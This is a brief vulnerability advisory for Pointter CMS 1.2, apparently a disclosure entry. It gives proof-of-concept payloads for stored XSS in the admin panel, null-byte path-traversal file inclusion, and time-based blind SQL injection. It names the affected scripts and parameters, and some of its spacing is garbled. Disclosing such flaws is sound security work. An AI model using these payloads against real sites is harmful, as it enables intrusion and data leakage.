Pointter is a PHP-based content management system. Multiple security vulnerabilities in Pointter 1.2 may cause sensitive information leakage.
[+] Info:
~~~~~~~~~ Pointter PHP Content Management System 1.2 Multiple VulnerabilitiesVendor: PangramSoft GmbHProduct web page: http://www.pointter.comAffected version: 1.2
[+] Poc:
~~~~~~~~~
XSS: The stored XSS is pretty much everywhere in the admin panel, just posting thestring "> <script> alert (1) </script> when editing some category, and on everyreturn on the main page u get annoyed. LFI: script: pointtercms/admin/functions/createcategory. phppost param: categorypoc: category = .. /.. /.. /.. /.. /.. /.. /.. /.. /test.txt % 00 & code = 0e = 0 script: pointtercms/admin/functions/createpage. phppost param: pageurl script: pointtercms/admin/functions/createproduct. phppost param: producturl bSQLi: script: pointtercms/admin/functions/editsettings. phppost param: onoff, count, boxname, tonoff, tname, monoff, mname, nonoff, nname, memonoff, memname, searchonoff, searchname, pos, tpos, mpos, npos, mempos, mail. poc: onoff = 1 + and + sleep (10) % 23 & pos = 0-Response size: 0 bytes, Duration: 10016 MS